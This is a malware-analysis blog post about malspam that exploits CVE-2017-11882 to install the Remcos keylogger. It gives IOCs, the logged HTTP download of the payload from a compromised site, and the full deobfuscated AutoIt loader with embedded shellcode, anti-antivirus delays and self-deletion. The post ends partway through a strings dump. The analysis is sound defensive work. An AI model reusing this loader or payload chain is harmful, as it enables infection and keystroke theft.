{"id":1106,"date":"2018-04-23T04:52:49","date_gmt":"2018-04-23T03:52:49","guid":{"rendered":"http:\/\/www.herbiez.com\/?p=1106"},"modified":"2018-04-23T06:36:08","modified_gmt":"2018-04-23T05:36:08","slug":"2018-04-21-top-urgent-request-for-quotaion-malspam-leads-to-cve-2017-11882-possible-remcos-infection","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=1106","title":{"rendered":"2018-04-21 “TOP URGENT\/\/: REQUEST FOR QUOTAION” Malspam Leads To CVE-2017-11882\/Possible Remcos Infection"},"content":{"rendered":"

Yesterday while looking for some malspam, I came across some emails that used the CVE-2017-11882 exploit which leveraged an AutoIT script to launch the Remcos keylogger process which used some anti-sandbox techniques as well. For some more information about the CVE, please see the following links:<\/p>\n

http:\/\/researchcenter.paloaltonetworks.com\/2017\/12\/unit42-analysis-of-cve-2017-11882-exploit-in-the-wild\/<\/a>
\nhttp:\/\/reversingminds-blog.logdown.com\/posts\/3907313-fileless-attack-in-word-without-macros-cve-2017-11882<\/a>
\n2018-02-17 REMCOS RAT FROM MALSPAM<\/a><\/p>\n

And some similarities to this post: 2017-06-23 LOKI BOT MALWARE USING CVE 2017-0199<\/a> as well. <\/p>\n

Most of the activity from this infection was on the host and not much at the network level from what I was able to determine. <\/p>\n

All the artifacts found from this investigation and logs\/PCAP can be found over at my Github located here<\/a>.<\/p>\n

\"\"<\/a><\/p>\n

IOCs:
\n=====
\n66.147.244.190 \/ persianlegals[.]com (GET \/wp-includes\/js\/gist.exe)
\n188.209.52.202 (TCP 1667) –> This callback was never established since the connection was RESET<\/p>\n

Other DNS entries found:
\n————————
\n188.209.52.202 \/ polextrading[.]ddns.net
\n188.209.52.202 \/ poliy[.]kozow.com<\/p>\n

Artifacts:
\n==========
\nFile name: RFQ File.doc
\nFile size: 169KB
\nFile path: NA
\nMD5 hash: 95c8c71a1f93a67a16beab1ec43c3837
\nVirustotal: http:\/\/www.virustotal.com\/#\/file\/59130c3542d86b8afde1d5a8bb6cdfe43bbd24a992f5b4b537bd808e3c7e6f99\/detection<\/a>
\nDetection ratio: 29 \/ 60
\nFirst Detected: 2018-04-14 22:41:33
\nHybrid Analysis: http:\/\/www.hybrid-analysis.com\/sample\/59130c3542d86b8afde1d5a8bb6cdfe43bbd24a992f5b4b537bd808e3c7e6f99?environmentId=100<\/a>
\nAny.Run: http:\/\/app.any.run\/tasks\/8ff12fe5-874f-45a6-9de6-bc348807b864<\/a><\/p>\n

File name: gist[1].exe \/ namegh.exe
\nFile size: 748KB
\nFile path: C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\9C4A7L3Z || C:\\Users\\%username%\\AppData\\Roaming\\
\nMD5 hash: 92a3720be042be024d4911eeafb64f08
\nVirustotal: http:\/\/www.virustotal.com\/#\/file\/894ad81a297854d5522c117f94490bce379fc6a54f8fe10a1f55143ecd5c8816\/detection<\/a>
\nDetection ratio: 44 \/ 65
\nFirst Detected: 2018-04-14 23:51:05<\/p>\n

File name: cgj=agr
\nFile size: 207KB
\nFile path: C:\\Users\\%username%\\AppData\\Local\\Temp\\01644247
\nMD5 hash: de7a40642603b71642a682f8396edfb4<\/p>\n

File name: ujb.mp4
\nFile size: 401KB
\nFile path: C:\\Users\\%username%\\AppData\\Local\\Temp\\01644247
\nMD5 hash: 92ff96f096eae63f6f63ed1c9359407f<\/p>\n

File name: enj.exe
\nFile size: 750KB
\nFile path: C:\\Users\\%username%\\AppData\\Local\\Temp\\01644247
\nMD5 hash: 71d8f6d5dc35517275bc38ebcc815f9f
\nVirustotal: http:\/\/www.virustotal.com\/#\/file\/fb73a819b37523126c7708a1d06f3b8825fa60c926154ab2d511ba668f49dc4b\/detection<\/a>
\nHybrid Analysis: http:\/\/www.hybrid-analysis.com\/search?query=71d8f6d5dc35517275bc38ebcc815f9f<\/a><\/p>\n

File name: logs.dat
\nFile size: 149KB
\nFile path: C:\\Users\\%username%\\AppData\\Roaming\\skype
\nMD5 hash: f3a107be14cbdae1159dd0763c470dcd<\/p>\n

File name: logs.dat (updated after a couple of hours)
\nFile size: 432KB
\nFile path: C:\\Users\\%username%\\AppData\\Roaming\\skype
\nMD5 hash: 0b7cb52f4cf41ba70850a11a83263836<\/p>\n

Analysis:
\n=========
\n\"\"<\/a><\/p>\n

This infection starts off like any other infection. The user is socially engineered into believing that the “quote” is very important and needs to be acted on. This CVE (CVE-2017-11882), much like CVE-2017-0199, requires the user to open the document for the infection chain to be kicked off and nothing more. Most users would think that the file is a Word doc, but upon closer examination of the file we can see that it is a RTF file instead.<\/p>\n

\r\nhead RFQ\\ File.doc \r\n{\\rtf{\\object\\objocx\\objupdate\\objw7268\\objh8697{\\*\\objdata...<shortened for read-ability>...<\/pre>\n
Opening the file on my test VM, I was greeted with an error message as seen below. Once I clicked past the error message I was left with a blank Word doc.<\/p>\n
\"\"<\/a><\/p>\n
When I looked at Process Monitor and then the Process Tree option, I could see that the exploit worked, and the equation editor kicked off which downloaded a file called “gist[1].exe.”<\/p>\n
\r\nGET \/wp-includes\/js\/gist.exe HTTP\/1.1\r\nAccept: *\/*\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3)\r\nHost: persianlegals[.]com\r\nConnection: Keep-Alive\r\n\r\nHTTP\/1.1 200 OK\r\nServer: nginx\/1.12.2\r\nDate: Sat, 21 Apr 2018 17:17:39 GMT\r\nContent-Type: application\/octet-stream\r\nContent-Length: 748359\r\nConnection: keep-alive\r\nLast-Modified: Sat, 14 Apr 2018 21:04:13 GMT\r\nCache-Control: max-age=10800\r\nExpires: Sat, 21 Apr 2018 14:46:55 GMT\r\nX-Endurance-Cache-Level: 2\r\nX-Acc-Exp: 43200\r\nX-Proxy-Cache: HIT persianlegals.com\r\nAccept-Ranges: bytes\r\n\r\nMZ......................@.............................................\t.!..L.!This program cannot be run in DOS mode....<shortened for read-ability>...<\/pre>\n
This file was copied from the Temporary Internet Files directory to the Roaming folder which then was executed and started as a new process.<\/p>\n
\"\"<\/a><\/p>\n
Once the “namegh.exe” process started up, it created numerous new files under the “C:\\Users\\%username%\\AppData\\Local\\Temp\\01644247” folder. This makes sense since this file is nothing more than a self-extracting RAR file as noted below.<\/p>\n
\"\"<\/a><\/p>\n
\"\"<\/a><\/p>\n
\"\"<\/a><\/p>\n
One of these files is called “enj.exe” which I saw had an command line argument at the end of the command:<\/p>\n
\r\nDate: 4\/21\/2018 6:17:45 PM\r\nCommand line: C:\\Users\\%username%\\AppData\\Local\\Temp\01644247\\enj.exe cgj=agr\r\n<\/pre>\n
Looking at the “cgr=agr” file within Notepad++ I noticed that this looked to be more of a script. Trying to modify this file proved pointless at first since it had been set with a “read-only” flag as you can see from the cleaned up version of this script below. Unfortunately I am not sure what language this is in – maybe AutoIT?<\/p>\n
Two things that I would like to call out here is the fact that 1) the script checks to see if there is an “Avastui.exe” process running and if so, pause the execution for 333.33333 hours and 2) there is another pause for this infection of 30 seconds.<\/p>\n
\r\n#NoTrayIcon\r\n$14E97B621FE59B4939980F003240C1B6 = "ujb.mp4"\r\nIf ProcessExists("" & "a" & "v" & "a" & "s" & "t" & "u" & "i.exe") Then\r\n\tExecute("Sleep(20000)")\r\nEndIf\r\n$6D8EA853F0F9D4F4725A7B18BA8E68E5 = @ScriptDir & "\\" & $14E97B621FE59B4939980F003240C1B6\r\n$989BD8DF7434150DDDCC4E3AF84571E3 = IniRead($6D8EA853F0F9D4F4725A7B18BA8E68E5, "Setting", "Dir", '')\r\n$A004D8DBA8473C461465D68FAC70F8A3 = IniRead(@ScriptDir & "\\" & $14E97B621FE59B4939980F003240C1B6, "Setting", "sK", '')\r\n$669140C254038420C265AA1347100276 = IniRead(@ScriptDir & "\\" & $14E97B621FE59B4939980F003240C1B6, "Setting", "sN", '')\r\nIf $A004D8DBA8473C461465D68FAC70F8A3 = '' Or $669140C254038420C265AA1347100276 = '' Then Exit\r\n$DC5F9E4C7C7486F444A04A1438F53349 = FileRead(@ScriptDir & "\\" & $14E97B621FE59B4939980F003240C1B6)\r\n$FA39CF41CED8EB2810F4476D567D84F0 = _S0x6754396CF0678EFE96699CF2AAC9BD57($DC5F9E4C7C7486F444A04A1438F53349, "[sData]", "[esData]")\r\n$DC5F9E4C7C7486F444A04A1438F53349 = $FA39CF41CED8EB2810F4476D567D84F0[0]\r\n$8BCFFF4E610FCA681DCE47B5BF1B2EB3 = _S0xDECB6E1F7A1579B054389D9327C67D72()\r\n$8690DF62828F61643BA1FACB21B0DAE4 = BinaryToString(_S0x5137D1CF25FE12128ADD3AC944C602CE($DC5F9E4C7C7486F444A04A1438F53349, $A004D8DBA8473C461465D68FAC70F8A3))\r\n$655F5F8DAAF4A8700FF43C84BFEC8FE8 = StringReplace($8690DF62828F61643BA1FACB21B0DAE4, "Settings File Name", $14E97B621FE59B4939980F003240C1B6)\r\nExecute('FileSetAttrib("*.*", "+HR")')\r\nFileWrite(@ScriptDir & "" & "" & "" & "" & "\\" & $8BCFFF4E610FCA681DCE47B5BF1B2EB3, $655F5F8DAAF4A8700FF43C84BFEC8FE8)\r\n$XeS = @AutoItExe\r\nRun($XeS & " " & _S0xB4259E6BC039D6BC5D5762737C3D468F(@ScriptDir & "\\" & $8BCFFF4E610FCA681DCE47B5BF1B2EB3))\r\nExecute('Sle" & "ep(10+10+10)')\r\nFunc _S0xB4259E6BC039D6BC5D5762737C3D468F($8BCFFF4E610FCA681DCE47B5BF1B2EB3)\r\n\tReturn FileGetShortName($8BCFFF4E610FCA681DCE47B5BF1B2EB3)\r\nEndFunc   ;==>_S0xB4259E6BC039D6BC5D5762737C3D468F\r\nFunc _S0xDECB6E1F7A1579B054389D9327C67D72()\r\n\tLocal $dskkhlkjqsdfg2sdfg6\r\n\tFor $079E54EF12FAB3EB258506F98F11BF58 = 1 To 5\r\n\t\t$dskkhlkjqsdfg2sdfg6 &= Chr(Random(65, 90, 1))\r\n\tNext\r\n\tReturn $dskkhlkjqsdfg2sdfg6\r\nEndFunc   ;==>_S0xDECB6E1F7A1579B054389D9327C67D72\r\nFunc _S0x6754396CF0678EFE96699CF2AAC9BD57($s_String, $s_Start, $s_End, $v_Case = -1)\r\n\tLocal $s_case = ""\r\n\tIf $v_Case = Default Or $v_Case = -1 Then $s_case = "(?i)"\r\n\tLocal $s_pattern_escape = "(\\.|\\||\\*|\\?|\\+|\\(|\\)|\\{|\\}|\\[|\\]|\\^|\\$|\\\\)"\r\n\t$s_Start = StringRegExpReplace($s_Start, $s_pattern_escape, "\\\\$1")\r\n\t$s_End = StringRegExpReplace($s_End, $s_pattern_escape, "\\\\$1")\r\n\tIf $s_Start = "" Then $s_Start = "\\A"\r\n\tIf $s_End = "" Then $s_End = "\\z"\r\n\tLocal $a_ret = StringRegExp($s_String, "(?s)" & $s_case & $s_Start & "(.*?)" & $s_End, 3)\r\n\tIf @error Then Return SetError(1, 0, 0)\r\n\tReturn $a_ret\r\nEndFunc   ;==>_S0x6754396CF0678EFE96699CF2AAC9BD57\r\nFunc _S0x5137D1CF25FE12128ADD3AC944C602CE($7F6C628AB520F901E5E5973C0BCFCF53, $D49132A476FE659BA30791AEB0D5EE9F)\r\n\t$xxxx = "0"\r\n\tLocal $46014F79ED3EF30B114AEF13E94E1ADE = $xxxx & "xC" & "81" & $xxxx & "" & $xxxx & "1" & $xxxx & "" & $xxxx & "6A" & $xxxx & "" & $xxxx & "6A" & $xxxx & "" & $xxxx & "5356578B551" & $xxxx & "31C989C84989D7F2AE484829C88945F" & $xxxx & "85C" & $xxxx & "" & $xxxx & "F84DC" & $xxxx & "" & $xxxx & "" & $xxxx & "" & $xxxx & "" & $xxxx & "" & $xxxx & "B9" & $xxxx & "" & $xxxx & "" & $xxxx & "1" & $xxxx & "" & $xxxx & "" & $xxxx & "" & $xxxx & "88C82C" & $xxxx & "18884" & $xxxx & "DEFFEFFFFE2F38365F4" & $xxxx & "" & $xxxx & "8365FC" & $xxxx & "" & $xxxx & "817DFC" & $xxxx & "" & $xxxx & "" & $xxxx & "1" & $xxxx & "" & $xxxx & "" & $xxxx & "" & $xxxx & "7D478B45FC31D2F775F" & $xxxx & "92" & $xxxx & "3451" & $xxxx & "" & $xxxx & "FB6" & $xxxx & "" & $xxxx & "8B4DFC" & $xxxx & "FB68C" & $xxxx & "DF" & $xxxx & "FEFFFF" & $xxxx & "1C8" & $xxxx & "345F425FF" & $xxxx & "" & $xxxx & "" & $xxxx & "" & $xxxx & "" & $xxxx & "" & $xxxx & "8945F48B75FC8A8435F" & $xxxx & "FEFFFF8B7DF486843DF" & $xxxx & "FEFFFF888435F" & $xxxx & "FEFFFFFF45FCEBB" & $xxxx & "8D9DF" & $xxxx & "FEFFFF31FF89FA3955" & $xxxx & "C76638B85ECFEFFFF4" & $xxxx & "25FF" & $xxxx & "" & $xxxx & "" & $xxxx & "" & $xxxx & "" & $xxxx & "" & $xxxx & "8985ECFEFFFF89D8" & $xxxx & "385ECFEFFFF" & $xxxx & "FB6" & $xxxx & "" & $xxxx & "" & $xxxx & "385E8FEFFFF25FF" & $xxxx & "" & $xxxx & "" & $xxxx & "" & $xxxx & "" & $xxxx & "" & $xxxx & "8985E8FEFFFF89DE" & $xxxx & "3B5ECFEFFFF8A" & $xxxx & "689DF" & $xxxx & "3BDE8FEFFFF86" & $xxxx & "788" & $xxxx & "6" & $xxxx & "FB6" & $xxxx & "E" & $xxxx & "FB6" & $xxxx & "7" & $xxxx & "1C181E1FF" & $xxxx & "" & $xxxx & "" & $xxxx & "" & $xxxx & "" & $xxxx & "" & $xxxx & "8A84" & $xxxx & "DF" & $xxxx & "FEFFFF8B75" & $xxxx & "8" & $xxxx & "1D63" & $xxxx & "" & $xxxx & "642EB985F5E5BC9C21" & $xxxx & "" & $xxxx & "" & $xxxx\r\n\tLocal $0D65E24FF0E10ADFDA9E7BF4AAB42CE3 = DllStructCreate("byte[" & BinaryLen($46014F79ED3EF30B114AEF13E94E1ADE) & "]")\r\n\tDllStructSetData($0D65E24FF0E10ADFDA9E7BF4AAB42CE3, 1, $46014F79ED3EF30B114AEF13E94E1ADE)\r\n\tLocal $1D8D88E7EADDA78EECE091439B6AC7F4 = DllStructCreate("byte[" & BinaryLen($7F6C628AB520F901E5E5973C0BCFCF53) & "]")\r\n\tDllStructSetData($1D8D88E7EADDA78EECE091439B6AC7F4, 1, $7F6C628AB520F901E5E5973C0BCFCF53)\r\n\tDllCall("user32.dll", "none", "CallWindowProc", "ptr", DllStructGetPtr($0D65E24FF0E10ADFDA9E7BF4AAB42CE3), "ptr", DllStructGetPtr($1D8D88E7EADDA78EECE091439B6AC7F4), "int", BinaryLen($7F6C628AB520F901E5E5973C0BCFCF53), "str", $D49132A476FE659BA30791AEB0D5EE9F, "int", 0)\r\n\tLocal $D483C7BC874BC719BACBE73B79DD313D = DllStructGetData($1D8D88E7EADDA78EECE091439B6AC7F4, 1)\r\n\t$1D8D88E7EADDA78EECE091439B6AC7F4 = 0\r\n\t$0D65E24FF0E10ADFDA9E7BF4AAB42CE3 = 0\r\n\tReturn $D483C7BC874BC719BACBE73B79DD313D\r\nEndFunc   ;==>_S0x5137D1CF25FE12128ADD3AC944C602CE\r\nFunc _S0xFA56E059CADB1D6DB397C7643F57CDF6($989BD8DF7434150DDDCC4E3AF84571E3)\r\n\t$F401F847041C5100472ACD2791125C65 = _S0xB4259E6BC039D6BC5D5762737C3D468F(@ScriptFullPath)\r\n\t$7B5198DFC8A7BD8A73CE366FD1FF1E83 = _S0xB4259E6BC039D6BC5D5762737C3D468F(@TempDir & "\\" & $989BD8DF7434150DDDCC4E3AF84571E3 & "\\" & @ScriptName)\r\n\tIf $F401F847041C5100472ACD2791125C65 = $7B5198DFC8A7BD8A73CE366FD1FF1E83 Then\r\n\tElse\r\n\t\tFileDelete(@ScriptFullPath)\r\n\t\tFileDelete(FileGetShortName(@AutoItExe))\r\n\t\tShutdown(6)\r\n\t\tExit\r\n\tEndIf\r\n\tIf WinExists($989BD8DF7434150DDDCC4E3AF84571E3) Then\r\n\t\tFileDelete(@ScriptFullPath)\r\n\t\tFileDelete(FileGetShortName(@AutoItExe))\r\n\t\tShutdown(6)\r\n\t\tExit\r\n\tEndIf\r\nEndFunc   ;==>_S0xFA56E059CADB1D6DB397C7643F57CDF6<\/pre>\n
At the top of the above script, there is call for another file in the same directory called “ujb.mp4” which contains some other bits that look like it may be used in the “cgj=agr” script. <\/p>\n
After this ran, the “enj.exe” started up a child process of itself and passed another command line argument as well.<\/p>\n
\"\"<\/a><\/p>\n
Unfortunately this file got deleted once the process finished so I am not sure what was in that file or how it played a role in this infection. <\/p>\n
It is here that persistence was created by adding a key to the Windows run registry key.<\/p>\n
\"\"<\/a><\/p>\n
Next, I believe, that the “ujb.mp4” file in the “01644247” folder helped setup the next child process – the “regsvcs.exe” process. I say this since there were a lot of read operations from the “enj.exe” (PID 3056) process to the “ujb.mp4” file, which then shortly after the “regsvcs.exe” process was created and executed. <\/p>\n
Once this process was up and running, there was a new registry key that was created: “HKCU\\Software\\Fmt-W5SO9H\\.”<\/p>\n
\r\n[HKEY_CURRENT_USER\\Software\\Fmt-W5SO9H]\r\n"EXEpath"=hex:5a,4a,ad,1f,5d,11,65,ed,38,65,c9,78,fe,ed,15,0a,e3,6e,cd,ea,aa,\\\r\n  98,a3,ef,87,97,66,a5,cf,48,96,c6,cf,4b,cf,48,96,d7,1e,02,4f,48,e3,ce,f5,ea,\\\r\n  79,4b,6c,fa,21,38,b5,c6,c5,f2,93,49,4c,43,0a,c0,17,98,ed,e7,86,3e,5b,00,20,\\\r\n  ca,d7,b3,40,1e,16,54,5c,fe,92,7c,c0,66,df,7c,14,91,70,55,d9,01,04,32,f4,d9,\\\r\n  81,6d,d5,d9,fc,ec,0b,68,33,3c,f1,28,1d,a1,d6,da,fd,8b,b6,c6<\/pre>\n
\"\"<\/a><\/p>\n
I also saw this process looking through the file system and through the registry querying what looked to be files\/keys related to what I can assume is Internet access. This would make sense since this was the process responsible for reaching out to the IP address of 188.209.52.202:1667 from time to time as seen in the screen captures below. This process also created the folder called “skype” which contained an encrypted “logs.dat” file. I can only surmise that this was the compromised site that the keylogger was uploading the “logs.dat” file to. <\/p>\n
\"\"<\/a>
\n\"\"<\/a><\/p>\n
***Note: I did see a reference to a “C&C” in the string output for this process that I mention at the bottom of this post.<\/p>\n
This process (regsvcs.exe – PID 2512) then finally created the “svchost.exe” process. Based on the Process Monitor logs I am not seeing anything really happening with this process. <\/p>\n
The other thing that intrigued me was what I could figure out from the processes “regsvcs.exe – PID 2512” and “svchost.exe – PID 352.” Using the tool strings2, I ran the following command to have it take a snapshot of what was in the process and if there was anything of interest in there.<\/p>\n
\r\nstrings2.exe -pid <INSERT PID OF PROCESS HERE> > <NAME OF OUTPUT LOG HERE.log><\/pre>\n
Below are some of the more interesting items that I found when looking through the strings output of regsvcs.exe – PID 2512. There are some bits of a script, a reference to the UAC bypass technique<\/a>, and Remcos as well. Odd thing is that I did not see this being executed (the UAC bypass that is). I also saw logged keys and applications that were opened on the VM. I also saw aspects that I saw from the network traffic and also some of the files and locations used in this infection. <\/p>\n
When performing this same activity for the svchost.exe – PID 352 process I was not able to find much in that log that stood out to me.<\/p>\n
\r\nTMP=C:\\Users\\Bill\\AppData\\Local\\Temp\r\nUSERDOMAIN=Bill-PC\r\nUSERNAME=Bill\r\nUSERPROFILE=C:\\Users\\Bill\r\nWecVersionForRosebud.564=4\r\nwindir=C:\\Windows\r\nwindows_tracing_flags=3\r\nwindows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log\r\n__COMPAT_LAYER=ElevateCreateProcess\r\ne~[4\r\n     \r\nabcdefghijklmnopqrstuvwxyz\r\nABCDEFGHIJKLMNOPQRSTUVWXYZ\r\n?~[nO\r\nC:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\RegSvcs.exe\r\nALLUSERSPROFILE=C:\\ProgramData\r\nAPPDATA=C:\\Users\\Bill\\AppData\\Roaming\r\nCommonProgramFiles=C:\\Program Files (x86)\\Common Files\r\nCommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files\r\nCommonProgramW6432=C:\\Program Files\\Common Files\r\nCOMPUTERNAME=BILL-PC\r\nComSpec=C:\\Windows\\system32\\cmd.exe\r\nFP_NO_HOST_CHECK=NO\r\nHOMEDRIVE=C:\r\nHOMEPATH=\\Users\\Bill\r\nLOCALAPPDATA=C:\\Users\\Bill\\AppData\\Local\r\nLOGONSERVER=\\\\BILL-PC\r\nNUMBER_OF_PROCESSORS=2\r\nOS=Windows_NT\r\nPath=C:\\Program Files\\Microsoft Office\\Office14\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\\r\nPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC\r\nPROCESSOR_ARCHITECTURE=x86\r\nPROCESSOR_ARCHITEW6432=AMD64\r\nPROCESSOR_IDENTIFIER=Intel64 Family 6 Model 61 Stepping 4, GenuineIntel\r\nPROCESSOR_LEVEL=6\r\nPROCESSOR_REVISION=3d04\r\nProgramData=C:\\ProgramData\r\nProgramFiles=C:\\Program Files (x86)\r\nProgramFiles(x86)=C:\\Program Files (x86)\r\nProgramW6432=C:\\Program Files\r\nPSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\\r\nPUBLIC=C:\\Users\\Public\r\nSESSIONNAME=Console\r\nsfxcmd="C:\\Users\\Bill\\AppData\\Roaming\\namegh.exe"\r\nsfxname=C:\\Users\\Bill\\AppData\\Roaming\\namegh.exe\r\nSystemDrive=C:\r\nSystemRoot=C:\\Windows\r\nTEMP=C:\\Users\\Bill\\AppData\\Local\\Temp\r\nTMP=C:\\Users\\Bill\\AppData\\Local\\Temp\r\nUSERDOMAIN=Bill-PC\r\nUSERNAME=Bill\r\nUSERPROFILE=C:\\Users\\Bill\r\nWecVersionForRosebud.564=4\r\nwindir=C:\\Windows\r\nwindows_tracing_flags=3\r\nwindows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log\r\n__COMPAT_LAYER=ElevateCreateProcess\r\n1~[`\r\nd~[5\r\nd~[5N\r\nd~[5N\r\nd~[5N\r\nd~[5N\r\nd~[5N\r\n$~[u\r\npoliy.kozow.com\r\nZVtP\r\nup2F\r\nup2F\r\nWVVtd\r\n8aYt\r\n8aYt0\r\nIVt8aYt\r\nbLVt0\r\nuLVt\r\nm1Ot \r\nP\/Gt\r\n"\/Gt\r\n-Gt9\/Gt\r\npoliy.kozow.com\r\nZVtP\r\nup2F\r\nup2F\r\nWVVtd\r\n8aYt\r\n8aYt0\r\nIVt8aYt\r\nbLVt0\r\nuLVt\r\nm1Ot \r\nP\/Gt\r\n"\/Gt\r\n-Gt9\/Gt\r\n.Vt\\\r\noVtH\r\neVtH\r\n'\/Xt1\r\n'\/XtIA\r\n]Vt\\\r\nX!}uFe\r\nX!}u\r\n%}uR\r\nwDMA\r\nGetConsoleWindow\r\nu<$A\r\n=::=::\\\r\nALLUSERSPROFILE=C:\\ProgramData\r\nAPPDATA=C:\\Users\\Bill\\AppData\\Roaming\r\nCommonProgramFiles=C:\\Program Files\\Common Files\r\nCommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files\r\nCommonProgramW6432=C:\\Program Files\\Common Files\r\nCOMPUTERNAME=BILL-PC\r\nComSpec=C:\\Windows\\system32\\cmd.exe\r\nFP_NO_HOST_CHECK=NO\r\nHOMEDRIVE=C:\r\nHOMEPATH=\\Users\\Bill\r\nLOCALAPPDATA=C:\\Users\\Bill\\AppData\\Local\r\nLOGONSERVER=\\\\BILL-PC\r\nNUMBER_OF_PROCESSORS=2\r\nOS=Windows_NT\r\nPath=C:\\Program Files\\Microsoft Office\\Office14\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\\r\nPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC\r\nPROCESSOR_ARCHITECTURE=AMD64\r\nPROCESSOR_IDENTIFIER=Intel64 Family 6 Model 61 Stepping 4, GenuineIntel\r\nPROCESSOR_LEVEL=6\r\nPROCESSOR_REVISION=3d04\r\nProgramData=C:\\ProgramData\r\nProgramFiles=C:\\Program Files\r\nProgramFiles(x86)=C:\\Program Files (x86)\r\nProgramW6432=C:\\Program Files\r\nPSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\\r\nPUBLIC=C:\\Users\\Public\r\nSESSIONNAME=Console\r\nsfxcmd="C:\\Users\\Bill\\AppData\\Roaming\\namegh.exe"\r\nsfxname=C:\\Users\\Bill\\AppData\\Roaming\\namegh.exe\r\nSystemDrive=C:\r\nSystemRoot=C:\\Windows\r\nTEMP=C:\\Users\\Bill\\AppData\\Local\\Temp\r\nTMP=C:\\Users\\Bill\\AppData\\Local\\Temp\r\nUSERDOMAIN=Bill-PC\r\nUSERNAME=Bill\r\nUSERPROFILE=C:\\Users\\Bill\r\nWecVersionForRosebud.564=4\r\nwindir=C:\\Windows\r\nwindows_tracing_flags=3\r\nwindows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log\r\n__COMPAT_LAYER=ElevateCreateProcess\r\nAYER=ElevateCreateProcess\r\ncess\r\ncess\r\nC:\\Users\\Bill\\AppData\\Local\\Temp\01644247\\\r\nC:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727;;C:\\Windows\\system32;C:\\Windows\\system;C:\\Windows;.;C:\\Program Files\\Microsoft Office\\Office14\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\\r\nC:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\RegSvcs.exe\r\n"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\RegSvcs.exe"\r\nC:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\RegSvcs.exe\r\nWinSta0\\Default\r\nC:\\Windows\\SYSTEM32\\ntdll.dll\r\nC:\\Windows\\system32\r\nC:\\Windows\\SYSTEM32\r\nC:\\Windows\\\r\n\\SYSTE\r\nTEM32\\\r\nC:\\Windows\\SYSTEM32\\wow64win.dll\r\n p-3\r\nC:\\Windows\\SYSTEM32\\wow64.dll\r\nTEM32\\\r\n\\??\\\r\n2\\wow6\r\n\\Sessions\\1\\Windows\\ApiPortection\r\nSERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\r\nC:\\Windows\\SYSTEM32\\wow64cpu.dll\r\n\\REGISTRY\\USER\\S-1-5-21-3643501033-861638929-733367513-1000\\Software\\Fmt-W5SO9H\\\r\nndows\\CurrentVersion\\Explorer\\User Shell Folders\r\nC:\\Users\\Bill\\AppData\\Local\\Temp\01644247\\\r\nC:\\Windows\\SysWOW64;;C:\\Windows\\system32;C:\\Windows\\system;C:\\Windows;.;C:\\Program Files\\Microsoft Office\\Office14\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\\r\nC:\\Windows\\SysWOW64\\svchost.exe\r\nC:\\Windows\\SysWOW64\\svchost.exe\r\n\\Registry\\MACHINE\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\SideBySide\r\niers\r\nAPPDATA=C:\\Users\\Bill\\AppData\\Roaming\r\nCommonProgramFiles=C:\\Program Files\\Common Files\r\nCommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files\r\nCommonProgramW6432=C:\\Program Files\\Common Files\r\nCOMPUTERNAME=BILL-PC\r\nComSpec=C:\\Windows\\system32\\cmd.exe\r\nFP_NO_HOST_CHECK=NO\r\nHOMEDRIVE=C:\r\nHOMEPATH=\\Users\\Bill\r\nLOCALAPPDATA=C:\\Users\\Bill\\AppData\\Local\r\nLOGONSERVER=\\\\BILL-PC\r\nNUMBER_OF_PROCESSORS=2\r\nOS=Windows_NT\r\nPath=C:\\Program Files\\Microsoft Office\\Office14\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\\r\nPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC\r\nPROCESSOR_ARCHITECTURE=AMD64\r\nPROCESSOR_IDENTIFIER=Intel64 Family 6 Model 61 Stepping 4, GenuineIntel\r\nPROCESSOR_LEVEL=6\r\nPROCESSOR_REVISION=3d04\r\nProgramData=C:\\ProgramData\r\nProgramFiles=C:\\Program Files\r\nProgramFiles(x86)=C:\\Program Files (x86)\r\nProgramW6432=C:\\Program 